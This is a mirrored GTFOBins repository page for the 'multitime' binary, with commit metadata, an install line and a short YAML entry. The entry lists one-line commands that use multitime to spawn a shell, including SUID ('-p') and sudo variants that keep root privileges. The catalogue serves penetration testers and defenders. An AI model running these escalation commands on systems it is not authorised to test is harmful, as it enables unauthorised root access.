mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
7cc6a227da
install: apt-get install -y multitime manual: https://manpages.ubuntu.com/manpages/impish/man1/multitime.1.html
10 lines
144 B
Markdown
10 lines
144 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: multitime /bin/sh
|
|
suid:
|
|
- code: ./multitime /bin/sh -p
|
|
sudo:
|
|
- code: sudo multitime /bin/sh
|
|
---
|